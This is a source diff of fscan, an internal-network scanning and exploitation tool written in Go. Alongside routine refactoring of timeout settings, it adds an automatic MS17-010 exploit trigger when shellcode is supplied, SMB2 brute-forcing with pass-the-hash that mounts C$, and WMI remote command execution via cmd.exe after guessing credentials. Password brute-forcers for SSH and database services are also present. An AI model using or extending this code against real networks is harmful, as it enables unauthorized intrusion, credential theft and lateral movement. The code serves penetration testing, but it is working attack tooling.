 	senddata := []byte{72, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 212, 7, 0, 0, 0, 0, 0, 0, 97, 100, 109, 105, 110, 46, 36, 99, 109, 100, 0, 0, 0, 0, 0, 1, 0, 0, 0, 33, 0, 0, 0, 2, 103, 101, 116, 76, 111, 103, 0, 16, 0, 0, 0, 115, 116, 97, 114, 116, 117, 112, 87, 97, 114, 110, 105, 110, 103, 115, 0, 0}
 	realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports)
-	conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(info.Timeout)*time.Second)
+	conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(common.Timeout)*time.Second)
 	defer func() {
 		if conn != nil {
 			conn.Close()
@@ -34,7 +33,7 @@ func MongodbUnauth(info *common.HostInfo) (flag bool, err error) {
 	if err != nil {
 		return flag, err
 	}
-	err = conn.SetReadDeadline(time.Now().Add(time.Duration(info.Timeout) * time.Second))
+	err = conn.SetReadDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second))
 	if err != nil {
 		return flag, err
 	}
--- a/Plugins/ms17010-exp.go
+++ b/Plugins/ms17010-exp.go
--- a/Plugins/ms17010.go
+++ b/Plugins/ms17010.go
@@ -33,7 +33,7 @@ func MS17010(info *common.HostInfo) error {
 func MS17010Scan(info *common.HostInfo) error {
 	ip := info.Host
 	// connecting to a host in LAN if reachable should be very quick
-	conn, err := common.WrapperTcpWithTimeout("tcp", ip+":445", time.Duration(info.Timeout)*time.Second)
+	conn, err := common.WrapperTcpWithTimeout("tcp", ip+":445", time.Duration(common.Timeout)*time.Second)
 	defer func() {
 		if conn != nil {
 			conn.Close()
@@ -43,7 +43,7 @@ func MS17010Scan(info *common.HostInfo) error {
 		//fmt.Printf("failed to connect to %s\n", ip)
 		return err
 	}
-	err = conn.SetDeadline(time.Now().Add(time.Duration(info.Timeout) * time.Second))
+	err = conn.SetDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second))
 	if err != nil {
 		//fmt.Printf("failed to connect to %s\n", ip)
 		return err
@@ -131,6 +131,11 @@ func MS17010Scan(info *common.HostInfo) error {
 		//} else{fmt.Printf("\033[33m%s\tMS17-010\t(%s)\033[0m\n", ip, os)}
 		result := fmt.Sprintf("[+] %s\tMS17-010\t(%s)", ip, os)
 		common.LogSuccess(result)
+		defer func() {
+			if common.SC != "" {
+				MS17010EXP(info)
+			}
+		}()
 		// detect present of DOUBLEPULSAR SMB implant
 		trans2SessionSetupRequest[28] = treeID[0]
 		trans2SessionSetupRequest[29] = treeID[1]
--- a/Plugins/mssql.go
+++ b/Plugins/mssql.go
@@ -27,7 +27,7 @@ func MssqlScan(info *common.HostInfo) (tmperr error) {
 				if common.CheckErrs(err) {
 					return err
 				}
-				if time.Now().Unix()-starttime > (int64(len(common.Userdict["mssql"])*len(common.Passwords)) * info.Timeout) {
+				if time.Now().Unix()-starttime > (int64(len(common.Userdict["mssql"])*len(common.Passwords)) * common.Timeout) {
 					return err
 				}
 			}
@@ -39,11 +39,11 @@ func MssqlScan(info *common.HostInfo) (tmperr error) {
 func MssqlConn(info *common.HostInfo, user string, pass string) (flag bool, err error) {
 	flag = false
 	Host, Port, Username, Password := info.Host, info.Ports, user, pass
-	dataSourceName := fmt.Sprintf("server=%s;user id=%s;password=%s;port=%v;encrypt=disable;timeout=%v", Host, Username, Password, Port, time.Duration(info.Timeout)*time.Second)
+	dataSourceName := fmt.Sprintf("server=%s;user id=%s;password=%s;port=%v;encrypt=disable;timeout=%v", Host, Username, Password, Port, time.Duration(common.Timeout)*time.Second)
 	db, err := sql.Open("mssql", dataSourceName)
 	if err == nil {
-		db.SetConnMaxLifetime(time.Duration(info.Timeout) * time.Second)
-		db.SetConnMaxIdleTime(time.Duration(info.Timeout) * time.Second)
+		db.SetConnMaxLifetime(time.Duration(common.Timeout) * time.Second)
+		db.SetConnMaxIdleTime(time.Duration(common.Timeout) * time.Second)
 		db.SetMaxIdleConns(0)
 		defer db.Close()
 		err = db.Ping()
--- a/Plugins/mysql.go
+++ b/Plugins/mysql.go
@@ -27,7 +27,7 @@ func MysqlScan(info *common.HostInfo) (tmperr error) {
 				if common.CheckErrs(err) {
 					return err
 				}
-				if time.Now().Unix()-starttime > (int64(len(common.Userdict["mysql"])*len(common.Passwords)) * info.Timeout) {
+				if time.Now().Unix()-starttime > (int64(len(common.Userdict["mysql"])*len(common.Passwords)) * common.Timeout) {
 					return err
 				}
 			}
@@ -39,11 +39,11 @@ func MysqlScan(info *common.HostInfo) (tmperr error) {
 func MysqlConn(info *common.HostInfo, user string, pass string) (flag bool, err error) {
 	flag = false
 	Host, Port, Username, Password := info.Host, info.Ports, user, pass
-	dataSourceName := fmt.Sprintf("%v:%v@tcp(%v:%v)/mysql?charset=utf8&timeout=%v", Username, Password, Host, Port, time.Duration(info.Timeout)*time.Second)
+	dataSourceName := fmt.Sprintf("%v:%v@tcp(%v:%v)/mysql?charset=utf8&timeout=%v", Username, Password, Host, Port, time.Duration(common.Timeout)*time.Second)
 	db, err := sql.Open("mysql", dataSourceName)
 	if err == nil {
-		db.SetConnMaxLifetime(time.Duration(info.Timeout) * time.Second)
-		db.SetConnMaxIdleTime(time.Duration(info.Timeout) * time.Second)
+		db.SetConnMaxLifetime(time.Duration(common.Timeout) * time.Second)
+		db.SetConnMaxIdleTime(time.Duration(common.Timeout) * time.Second)
 		db.SetMaxIdleConns(0)
 		defer db.Close()
 		err = db.Ping()
--- a/Plugins/oracle.go
+++ b/Plugins/oracle.go
@@ -27,7 +27,7 @@ func OracleScan(info *common.HostInfo) (tmperr error) {
 				if common.CheckErrs(err) {
 					return err
 				}
-				if time.Now().Unix()-starttime > (int64(len(common.Userdict["oracle"])*len(common.Passwords)) * info.Timeout) {
+				if time.Now().Unix()-starttime > (int64(len(common.Userdict["oracle"])*len(common.Passwords)) * common.Timeout) {
 					return err
 				}
 			}
@@ -42,8 +42,8 @@ func OracleConn(info *common.HostInfo, user string, pass string) (flag bool, err
 	dataSourceName := fmt.Sprintf("oracle://%s:%s@%s:%s/orcl", Username, Password, Host, Port)
 	db, err := sql.Open("oracle", dataSourceName)
 	if err == nil {
-		db.SetConnMaxLifetime(time.Duration(info.Timeout) * time.Second)
-		db.SetConnMaxIdleTime(time.Duration(info.Timeout) * time.Second)
+		db.SetConnMaxLifetime(time.Duration(common.Timeout) * time.Second)
+		db.SetConnMaxIdleTime(time.Duration(common.Timeout) * time.Second)
 		db.SetMaxIdleConns(0)
 		defer db.Close()
 		err = db.Ping()
--- a/Plugins/postgres.go
+++ b/Plugins/postgres.go
@@ -27,7 +27,7 @@ func PostgresScan(info *common.HostInfo) (tmperr error) {
 				if common.CheckErrs(err) {
 					return err
 				}
-				if time.Now().Unix()-starttime > (int64(len(common.Userdict["postgresql"])*len(common.Passwords)) * info.Timeout) {
+				if time.Now().Unix()-starttime > (int64(len(common.Userdict["postgresql"])*len(common.Passwords)) * common.Timeout) {
 					return err
 				}
 			}
@@ -42,7 +42,7 @@ func PostgresConn(info *common.HostInfo, user string, pass string) (flag bool, e
 	dataSourceName := fmt.Sprintf("postgres://%v:%v@%v:%v/%v?sslmode=%v", Username, Password, Host, Port, "postgres", "disable")
 	db, err := sql.Open("postgres", dataSourceName)
 	if err == nil {
-		db.SetConnMaxLifetime(time.Duration(info.Timeout) * time.Second)
+		db.SetConnMaxLifetime(time.Duration(common.Timeout) * time.Second)
 		defer db.Close()
 		err = db.Ping()
 		if err == nil {
--- a/Plugins/rdp.go
+++ b/Plugins/rdp.go
@@ -48,7 +48,7 @@ func RdpScan(info *common.HostInfo) (tmperr error) {

 	for i := 0; i < common.BruteThread; i++ {
 		wg.Add(1)
-		go worker(info.Host, info.Domain, port, &wg, brlist, &signal, &num, all, &mutex, info.Timeout)
+		go worker(info.Host, common.Domain, port, &wg, brlist, &signal, &num, all, &mutex, common.Timeout)
 	}

 	close(brlist)
--- a/Plugins/redis.go
+++ b/Plugins/redis.go
@@ -36,7 +36,7 @@ func RedisScan(info *common.HostInfo) (tmperr error) {
 			if common.CheckErrs(err) {
 				return err
 			}
-			if time.Now().Unix()-starttime > (int64(len(common.Passwords)) * info.Timeout) {
+			if time.Now().Unix()-starttime > (int64(len(common.Passwords)) * common.Timeout) {
 				return err
 			}
 		}
@@ -47,7 +47,7 @@ func RedisScan(info *common.HostInfo) (tmperr error) {
 func RedisConn(info *common.HostInfo, pass string) (flag bool, err error) {
 	flag = false
 	realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports)
-	conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(info.Timeout)*time.Second)
+	conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(common.Timeout)*time.Second)
 	defer func() {
 		if conn != nil {
 			conn.Close()
@@ -56,7 +56,7 @@ func RedisConn(info *common.HostInfo, pass string) (flag bool, err error) {
 	if err != nil {
 		return flag, err
 	}
-	err = conn.SetReadDeadline(time.Now().Add(time.Duration(info.Timeout) * time.Second))
+	err = conn.SetReadDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second))
 	if err != nil {
 		return flag, err
 	}
@@ -87,7 +87,7 @@ func RedisConn(info *common.HostInfo, pass string) (flag bool, err error) {
 func RedisUnauth(info *common.HostInfo) (flag bool, err error) {
 	flag = false
 	realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports)
-	conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(info.Timeout)*time.Second)
+	conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(common.Timeout)*time.Second)
 	defer func() {
 		if conn != nil {
 			conn.Close()
@@ -96,7 +96,7 @@ func RedisUnauth(info *common.HostInfo) (flag bool, err error) {
 	if err != nil {
 		return flag, err
 	}
-	err = conn.SetReadDeadline(time.Now().Add(time.Duration(info.Timeout) * time.Second))
+	err = conn.SetReadDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second))
 	if err != nil {
 		return flag, err
 	}
--- a/Plugins/scanner.go
+++ b/Plugins/scanner.go
@@ -1,7 +1,6 @@
 package Plugins

 import (
-	"errors"
 	"fmt"
 	"github.com/shadow1ng/fscan/WebScan/lib"
 	"github.com/shadow1ng/fscan/common"
@@ -21,27 +20,39 @@ func Scan(info common.HostInfo) {
 	lib.Inithttp(common.Pocinfo)
 	var ch = make(chan struct{}, common.Threads)
 	var wg = sync.WaitGroup{}
-	if len(Hosts) > 0 {
-		if common.IsPing == false {
+	web := strconv.Itoa(common.PORTList["web"])
+	ms17010 := strconv.Itoa(common.PORTList["ms17010"])
+	if len(Hosts) > 0 || len(common.HostPort) > 0 {
+		if common.NoPing == false && len(Hosts) > 0 {
 			Hosts = CheckLive(Hosts, common.Ping)
 			fmt.Println("[*] Icmp alive hosts len is:", len(Hosts))
 		}
-		if info.Scantype == "icmp" {
+		if common.Scantype == "icmp" {
 			common.LogWG.Wait()
 			return
 		}
+		common.GC()
 		var AlivePorts []string
-		if info.Scantype == "webonly" {
+		if common.Scantype == "webonly" || common.Scantype == "webpoc" {
 			AlivePorts = NoPortScan(Hosts, info.Ports)
-		} else {
-			AlivePorts = PortScan(Hosts, info.Ports, info.Timeout)
+		} else if common.Scantype == "hostname" {
+			info.Ports = "139"
+			AlivePorts = NoPortScan(Hosts, info.Ports)
+		} else if len(Hosts) > 0 {
+			AlivePorts = PortScan(Hosts, info.Ports, common.Timeout)
 			fmt.Println("[*] alive ports len is:", len(AlivePorts))
-			if info.Scantype == "portscan" {
+			if common.Scantype == "portscan" {
 				common.LogWG.Wait()
 				return
 			}
 		}
-
+		if len(common.HostPort) > 0 {
+			AlivePorts = append(AlivePorts, common.HostPort...)
+			AlivePorts = common.RemoveDuplicate(AlivePorts)
+			common.HostPort = nil
+			fmt.Println("[*] AlivePorts len is:", len(AlivePorts))
+		}
+		common.GC()
 		var severports []string //severports := []string{"21","22","135"."445","1433","3306","5432","6379","9200","11211","27017"...}
 		for _, port := range common.PORTList {
 			severports = append(severports, strconv.Itoa(port))
@@ -49,39 +60,37 @@ func Scan(info common.HostInfo) {
 		fmt.Println("start vulscan")
 		for _, targetIP := range AlivePorts {
 			info.Host, info.Ports = strings.Split(targetIP, ":")[0], strings.Split(targetIP, ":")[1]
-			if info.Scantype == "all" || info.Scantype == "main" {
+			if common.Scantype == "all" || common.Scantype == "main" {
 				switch {
 				case info.Ports == "135":
-					AddScan(info.Ports, info, ch, &wg) //findnet
+					AddScan(info.Ports, info, &ch, &wg) //findnet
+					if common.IsWmi {
+						AddScan("1000005", info, &ch, &wg) //wmiexec
+					}
 				case info.Ports == "445":
+					AddScan(ms17010, info, &ch, &wg) //ms17010
 					//AddScan(info.Ports, info, ch, &wg)  //smb
-					AddScan("1000001", info, ch, &wg) //ms17010
 					//AddScan("1000002", info, ch, &wg) //smbghost
 				case info.Ports == "9000":
-					AddScan(info.Ports, info, ch, &wg) //fcgiscan
-					AddScan("1000003", info, ch, &wg)  //http
+					AddScan(web, info, &ch, &wg)        //http
+					AddScan(info.Ports, info, &ch, &wg) //fcgiscan
 				case IsContain(severports, info.Ports):
-					AddScan(info.Ports, info, ch, &wg) //plugins scan
+					AddScan(info.Ports, info, &ch, &wg) //plugins scan
 				default:
-					AddScan("1000003", info, ch, &wg) //webtitle
+					AddScan(web, info, &ch, &wg) //webtitle
 				}
 			} else {
-				port, _ := common.PORTList[info.Scantype]
-				scantype := strconv.Itoa(port)
-				AddScan(scantype, info, ch, &wg)
+				scantype := strconv.Itoa(common.PORTList[common.Scantype])
+				AddScan(scantype, info, &ch, &wg)
 			}
 		}
 	}
-	if common.URL != "" {
-		info.Url = common.URL
-		AddScan("1000003", info, ch, &wg)
-	}
-	if len(common.Urls) > 0 {
-		for _, url := range common.Urls {
-			info.Url = url
-			AddScan("1000003", info, ch, &wg)
-		}
+	common.GC()
+	for _, url := range common.Urls {
+		info.Url = url
+		AddScan(web, info, &ch, &wg)
 	}
+	common.GC()
 	wg.Wait()
 	common.LogWG.Wait()
 	close(common.Results)
@@ -90,35 +99,26 @@ func Scan(info common.HostInfo) {

 var Mutex = &sync.Mutex{}

-func AddScan(scantype string, info common.HostInfo, ch chan struct{}, wg *sync.WaitGroup) {
+func AddScan(scantype string, info common.HostInfo, ch *chan struct{}, wg *sync.WaitGroup) {
+	*ch <- struct{}{}
 	wg.Add(1)
 	go func() {
 		Mutex.Lock()
 		common.Num += 1
 		Mutex.Unlock()
-		ScanFunc(PluginList, scantype, &info)
+		ScanFunc(&scantype, &info)
 		Mutex.Lock()
 		common.End += 1
 		Mutex.Unlock()
-		<-ch
 		wg.Done()
+		<-*ch
 	}()
-	ch <- struct{}{}
 }

-func ScanFunc(m map[string]interface{}, name string, infos ...interface{}) (result []reflect.Value, err error) {
-	f := reflect.ValueOf(m[name])
-	if len(infos) != f.Type().NumIn() {
-		err = errors.New("The number of infos is not adapted ")
-		fmt.Println(err.Error())
-		return result, nil
-	}
-	in := make([]reflect.Value, len(infos))
-	for k, info := range infos {
-		in[k] = reflect.ValueOf(info)
-	}
-	result = f.Call(in)
-	return result, nil
+func ScanFunc(name *string, info *common.HostInfo) {
+	f := reflect.ValueOf(PluginList[*name])
+	in := []reflect.Value{reflect.ValueOf(info)}
+	f.Call(in)
 }

 func IsContain(items []string, item string) bool {
--- a/Plugins/smb.go
+++ b/Plugins/smb.go
@@ -20,8 +20,8 @@ func SmbScan(info *common.HostInfo) (tmperr error) {
 			flag, err := doWithTimeOut(info, user, pass)
 			if flag == true && err == nil {
 				var result string
-				if info.Domain != "" {
-					result = fmt.Sprintf("[+] SMB:%v:%v:%v\\%v %v", info.Host, info.Ports, info.Domain, user, pass)
+				if common.Domain != "" {
+					result = fmt.Sprintf("[+] SMB:%v:%v:%v\\%v %v", info.Host, info.Ports, common.Domain, user, pass)
 				} else {
 					result = fmt.Sprintf("[+] SMB:%v:%v:%v %v", info.Host, info.Ports, user, pass)
 				}
@@ -35,7 +35,7 @@ func SmbScan(info *common.HostInfo) (tmperr error) {
 				if common.CheckErrs(err) {
 					return err
 				}
-				if time.Now().Unix()-starttime > (int64(len(common.Userdict["smb"])*len(common.Passwords)) * info.Timeout) {
+				if time.Now().Unix()-starttime > (int64(len(common.Userdict["smb"])*len(common.Passwords)) * common.Timeout) {
 					return err
 				}
 			}
@@ -52,7 +52,7 @@ func SmblConn(info *common.HostInfo, user string, pass string, signal chan struc
 		Port:        445,
 		User:        Username,
 		Password:    Password,
-		Domain:      info.Domain,
+		Domain:      common.Domain,
 		Workstation: "",
 	}

@@ -75,7 +75,7 @@ func doWithTimeOut(info *common.HostInfo, user string, pass string) (flag bool,
 	select {
 	case <-signal:
 		return flag, err
-	case <-time.After(time.Duration(info.Timeout) * time.Second):
+	case <-time.After(time.Duration(common.Timeout) * time.Second):
 		return false, errors.New("time out")
 	}
 }
--- a/Plugins/smb2.go
+++ b/Plugins/smb2.go
@@ -0,0 +1,176 @@
+package Plugins
+
+import (
+	"fmt"
+	"github.com/shadow1ng/fscan/common"
+	"net"
+	"os"
+	"strings"
+	"time"
+
+	"github.com/hirochachacha/go-smb2"
+)
+
+func SmbScan2(info *common.HostInfo) (tmperr error) {
+	if common.IsBrute {
+		return nil
+	}
+	hasprint := false
+	starttime := time.Now().Unix()
+	hash := common.HashBytes
+	for _, user := range common.Userdict["smb"] {
+	PASS:
+		for _, pass := range common.Passwords {
+			pass = strings.Replace(pass, "{user}", user, -1)
+			flag, err, flag2 := Smb2Con(info, user, pass, hash, hasprint)
+			if flag2 {
+				hasprint = true
+			}
+			if flag == true {
+				var result string
+				if common.Domain != "" {
+					result = fmt.Sprintf("[+] SMB2:%v:%v:%v\\%v ", info.Host, info.Ports, common.Domain, user)
+				} else {
+					result = fmt.Sprintf("[+] SMB2:%v:%v:%v ", info.Host, info.Ports, user)
+				}
+				if len(hash) > 0 {
+					result += "hash: " + common.Hash
+				} else {
+					result += pass
+				}
+				common.LogSuccess(result)
+				return err
+			} else {
+				var errlog string
+				if len(common.Hash) > 0 {
+					errlog = fmt.Sprintf("[-] smb2 %v:%v %v %v %v", info.Host, 445, user, common.Hash, err)
+				} else {
+					errlog = fmt.Sprintf("[-] smb2 %v:%v %v %v %v", info.Host, 445, user, pass, err)
+				}
+				errlog = strings.Replace(errlog, "\n", " ", -1)
+				common.LogError(errlog)
+				tmperr = err
+				if common.CheckErrs(err) {
+					return err
+				}
+				if time.Now().Unix()-starttime > (int64(len(common.Userdict["smb"])*len(common.Passwords)) * common.Timeout) {
+					return err
+				}
+			}
+			if len(common.Hash) > 0 {
+				break PASS
+			}
+		}
+	}
+	return tmperr
+}
+
+func Smb2Con(info *common.HostInfo, user string, pass string, hash []byte, hasprint bool) (flag bool, err error, flag2 bool) {
+	conn, err := net.DialTimeout("tcp", info.Host+":445", time.Duration(common.Timeout)*time.Second)
+	defer func() {
+		if conn != nil {
+			conn.Close()
+		}
+	}()
+	if err != nil {
+		return
+	}
+	initiator := smb2.NTLMInitiator{
+		User:   user,
+		Domain: common.Domain,
+	}
+	if len(hash) > 0 {
+		initiator.Hash = hash
+	} else {
+		initiator.Password = pass
+	}
+	d := &smb2.Dialer{
+		Initiator: &initiator,
+	}
+
+	s, err := d.Dial(conn)
+	if err != nil {
+		return
+	}
+	defer s.Logoff()
+	names, err := s.ListSharenames()
+	if err != nil {
+		return
+	}
+	if !hasprint {
+		var result string
+		if common.Domain != "" {
+			result = fmt.Sprintf("[*] SMB2-shares:%v:%v:%v\\%v ", info.Host, info.Ports, common.Domain, user)
+		} else {
+			result = fmt.Sprintf("[*] SMB2-shares:%v:%v:%v ", info.Host, info.Ports, user)
+		}
+		if len(hash) > 0 {
+			result += "hash: " + common.Hash
+		} else {
+			result += pass
+		}
+		result = fmt.Sprintf("%v shares: %v", result, names)
+		common.LogSuccess(result)
+		flag2 = true
+	}
+	fs, err := s.Mount("C$")
+	if err != nil {
+		return
+	}
+	defer fs.Umount()
+	path := `Windows\win.ini`
+	f, err := fs.OpenFile(path, os.O_RDONLY, 0666)
+	if err != nil {
+		return
+	}
+	defer f.Close()
+	flag = true
+	return
+	//bs, err := ioutil.ReadAll(f)
+	//if err != nil {
+	//	return
+	//}
+	//fmt.Println(string(bs))
+	//return
+
+}
+
+//if info.Path == ""{
+//}
+//path = info.Path
+//f, err := fs.OpenFile(path, os.O_RDONLY, 0666)
+//if err != nil {
+//	return
+//}
+//flag = true
+//_, err = f.Seek(0, io.SeekStart)
+//if err != nil {
+//	return
+//}
+//bs, err := ioutil.ReadAll(f)
+//if err != nil {
+//	return
+//}
+//fmt.Println(string(bs))
+//return
+//f, err := fs.Create(`Users\Public\Videos\hello.txt`)
+//if err != nil {
+//	return
+//}
+//flag = true
+//
+//_, err = f.Write([]byte("Hello world!"))
+//if err != nil {
+//	return
+//}
+//
+//_, err = f.Seek(0, io.SeekStart)
+//if err != nil {
+//	return
+//}
+//bs, err := ioutil.ReadAll(f)
+//if err != nil {
+//	return
+//}
+//fmt.Println(string(bs))
+//return
--- a/Plugins/ssh.go
+++ b/Plugins/ssh.go
@@ -29,11 +29,11 @@ func SshScan(info *common.HostInfo) (tmperr error) {
 				if common.CheckErrs(err) {
 					return err
 				}
-				if time.Now().Unix()-starttime > (int64(len(common.Userdict["ssh"])*len(common.Passwords)) * info.Timeout) {
+				if time.Now().Unix()-starttime > (int64(len(common.Userdict["ssh"])*len(common.Passwords)) * common.Timeout) {
 					return err
 				}
 			}
-			if info.SshKey != "" {
+			if common.SshKey != "" {
 				return err
 			}
 		}
@@ -45,8 +45,8 @@ func SshConn(info *common.HostInfo, user string, pass string) (flag bool, err er
 	flag = false
 	Host, Port, Username, Password := info.Host, info.Ports, user, pass
 	Auth := []ssh.AuthMethod{}
-	if info.SshKey != "" {
-		pemBytes, err := ioutil.ReadFile(info.SshKey)
+	if common.SshKey != "" {
+		pemBytes, err := ioutil.ReadFile(common.SshKey)
 		if err != nil {
 			return false, errors.New("read key failed" + err.Error())
 		}
@@ -62,7 +62,7 @@ func SshConn(info *common.HostInfo, user string, pass string) (flag bool, err er
 	config := &ssh.ClientConfig{
 		User:    Username,
 		Auth:    Auth,
-		Timeout: time.Duration(info.Timeout) * time.Second,
+		Timeout: time.Duration(common.Timeout) * time.Second,
 		HostKeyCallback: func(hostname string, remote net.Addr, key ssh.PublicKey) error {
 			return nil
 		},
@@ -76,16 +76,16 @@ func SshConn(info *common.HostInfo, user string, pass string) (flag bool, err er
 			defer session.Close()
 			flag = true
 			var result string
-			if info.Command != "" {
-				combo, _ := session.CombinedOutput(info.Command)
+			if common.Command != "" {
+				combo, _ := session.CombinedOutput(common.Command)
 				result = fmt.Sprintf("[+] SSH:%v:%v:%v %v \n %v", Host, Port, Username, Password, string(combo))
-				if info.SshKey != "" {
+				if common.SshKey != "" {
 					result = fmt.Sprintf("[+] SSH:%v:%v sshkey correct \n %v", Host, Port, string(combo))
 				}
 				common.LogSuccess(result)
 			} else {
 				result = fmt.Sprintf("[+] SSH:%v:%v:%v %v", Host, Port, Username, Password)
-				if info.SshKey != "" {
+				if common.SshKey != "" {
 					result = fmt.Sprintf("[+] SSH:%v:%v sshkey correct", Host, Port)
 				}
 				common.LogSuccess(result)
--- a/Plugins/webtitle.go
+++ b/Plugins/webtitle.go
@@ -19,9 +19,14 @@ import (
 )

 func WebTitle(info *common.HostInfo) error {
+	if common.Scantype == "webpoc" {
+		WebScan.WebScan(info)
+		return nil
+	}
 	err, CheckData := GOWebTitle(info)
 	info.Infostr = WebScan.InfoCheck(info.Url, &CheckData)
-	if common.IsWebCan == false && common.IsBrute == false && err == nil {
+
+	if common.IsWebCan == false && err == nil {
 		WebScan.WebScan(info)
 	} else {
 		errlog := fmt.Sprintf("[-] webtitle %v %v", info.Url, err)
@@ -38,13 +43,13 @@ func GOWebTitle(info *common.HostInfo) (err error, CheckData []WebScan.CheckData
 			info.Url = fmt.Sprintf("https://%s", info.Host)
 		default:
 			host := fmt.Sprintf("%s:%s", info.Host, info.Ports)
-			protocol := GetProtocol(host, info.Timeout)
+			protocol := GetProtocol(host, common.Timeout)
 			info.Url = fmt.Sprintf("%s://%s:%s", protocol, info.Host, info.Ports)
 		}
 	} else {
 		if !strings.Contains(info.Url, "://") {
 			host := strings.Split(info.Url, "/")[0]
-			protocol := GetProtocol(host, info.Timeout)
+			protocol := GetProtocol(host, common.Timeout)
 			info.Url = fmt.Sprintf("%s://%s", protocol, info.Url)
 		}
 	}
@@ -75,8 +80,8 @@ func GOWebTitle(info *common.HostInfo) (err error, CheckData []WebScan.CheckData
 			}
 		}
 	}
-
-	err, _, CheckData = geturl(info, 2, CheckData)
+	//是否访问图标
+	//err, _, CheckData = geturl(info, 2, CheckData)
 	if err != nil {
 		return
 	}
@@ -102,14 +107,17 @@ func geturl(info *common.HostInfo, flag int, CheckData []WebScan.CheckDatas) (er
 	if err != nil {
 		return err, "", CheckData
 	}
-	req.Header.Set("User-agent", "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36")
-	req.Header.Set("Accept", "*/*")
+	req.Header.Set("User-agent", common.UserAgent)
+	req.Header.Set("Accept", common.Accept)
 	req.Header.Set("Accept-Language", "zh-CN,zh;q=0.9")
-	if common.Pocinfo.Cookie != "" {
-		req.Header.Set("Cookie", "rememberMe=1;"+common.Pocinfo.Cookie)
-	} else {
-		req.Header.Set("Cookie", "rememberMe=1")
+	if common.Cookie != "" {
+		req.Header.Set("Cookie", common.Cookie)
 	}
+	//if common.Pocinfo.Cookie != "" {
+	//	req.Header.Set("Cookie", "rememberMe=1;"+common.Pocinfo.Cookie)
+	//} else {
+	//	req.Header.Set("Cookie", "rememberMe=1")
+	//}
 	req.Header.Set("Connection", "close")
 	var client *http.Client
 	if flag == 1 {
@@ -144,7 +152,7 @@ func geturl(info *common.HostInfo, flag int, CheckData []WebScan.CheckDatas) (er
 		if err1 == nil {
 			reurl = redirURL.String()
 		}
-		result := fmt.Sprintf("[*] WebTitle:%-25v code:%-3v len:%-6v title:%v", resp.Request.URL, resp.StatusCode, length, title)
+		result := fmt.Sprintf("[*] WebTitle: %-25v code:%-3v len:%-6v title:%v", resp.Request.URL, resp.StatusCode, length, title)
 		if reurl != "" {
 			result += fmt.Sprintf(" 跳转url: %s", reurl)
 		}
--- a/Plugins/wmiexec.go
+++ b/Plugins/wmiexec.go
@@ -0,0 +1,117 @@
+package Plugins
+
+import (
+	"errors"
+	"fmt"
+	"github.com/shadow1ng/fscan/common"
+	"os"
+	"strings"
+	"time"
+
+	"github.com/C-Sto/goWMIExec/pkg/wmiexec"
+)
+
+var ClientHost string
+var flag bool
+
+func init() {
+	if flag {
+		return
+	}
+	clientHost, err := os.Hostname()
+	if err != nil {
+		fmt.Println(err)
+	}
+	ClientHost = clientHost
+	flag = true
+}
+
+func WmiExec(info *common.HostInfo) (tmperr error) {
+	if common.IsBrute {
+		return nil
+	}
+	starttime := time.Now().Unix()
+	for _, user := range common.Userdict["smb"] {
+	PASS:
+		for _, pass := range common.Passwords {
+			pass = strings.Replace(pass, "{user}", user, -1)
+			flag, err := Wmiexec(info, user, pass, common.Hash)
+			errlog := fmt.Sprintf("[-] WmiExec  %v:%v %v %v %v", info.Host, 445, user, pass, err)
+			errlog = strings.Replace(errlog, "\n", "", -1)
+			common.LogError(errlog)
+			if flag == true {
+				var result string
+				if common.Domain != "" {
+					result = fmt.Sprintf("[+] WmiExec:%v:%v:%v\\%v ", info.Host, info.Ports, common.Domain, user)
+				} else {
+					result = fmt.Sprintf("[+] WmiExec:%v:%v:%v ", info.Host, info.Ports, user)
+				}
+				if common.Hash != "" {
+					result += "hash: " + common.Hash
+				} else {
+					result += pass
+				}
+				common.LogSuccess(result)
+				return err
+			} else {
+				tmperr = err
+				if common.CheckErrs(err) {
+					return err
+				}
+				if time.Now().Unix()-starttime > (int64(len(common.Userdict["smb"])*len(common.Passwords)) * common.Timeout) {
+					return err
+				}
+			}
+			if len(common.Hash) == 32 {
+				break PASS
+			}
+		}
+	}
+	return tmperr
+}
+
+func Wmiexec(info *common.HostInfo, user string, pass string, hash string) (flag bool, err error) {
+	target := fmt.Sprintf("%s:%v", info.Host, info.Ports)
+	wmiexec.Timeout = int(common.Timeout)
+	return WMIExec(target, user, pass, hash, common.Domain, common.Command, ClientHost, "", nil)
+}
+
+func WMIExec(target, username, password, hash, domain, command, clientHostname, binding string, cfgIn *wmiexec.WmiExecConfig) (flag bool, err error) {
+	if cfgIn == nil {
+		cfg, err1 := wmiexec.NewExecConfig(username, password, hash, domain, target, clientHostname, true, nil, nil)
+		if err1 != nil {
+			err = err1
+			return
+		}
+		cfgIn = &cfg
+	}
+	execer := wmiexec.NewExecer(cfgIn)
+	err = execer.SetTargetBinding(binding)
+	if err != nil {
+		return
+	}
+
+	err = execer.Auth()
+	if err != nil {
+		return
+	}
+	flag = true
+
+	if command != "" {
+		command = "C:\\Windows\\system32\\cmd.exe /c " + command
+		if execer.TargetRPCPort == 0 {
+			err = errors.New("RPC Port is 0, cannot connect")
+			return
+		}
+
+		err = execer.RPCConnect()
+		if err != nil {
+			return
+		}
+		err = execer.Exec(command)
+		if err != nil {
+			return
+		}
+	}
+	return
+}
--- a/README.md
+++ b/README.md
@@ -1,10 +1,10 @@
 # fscan

-# 简介
+# 1. 简介
 一款内网综合扫描工具，方便一键自动化、全方位漏扫扫描。   
 支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。

-## 主要功能
+# 2. 主要功能
 1.信息搜集:
 * 存活探测(icmp)
 * 端口扫描
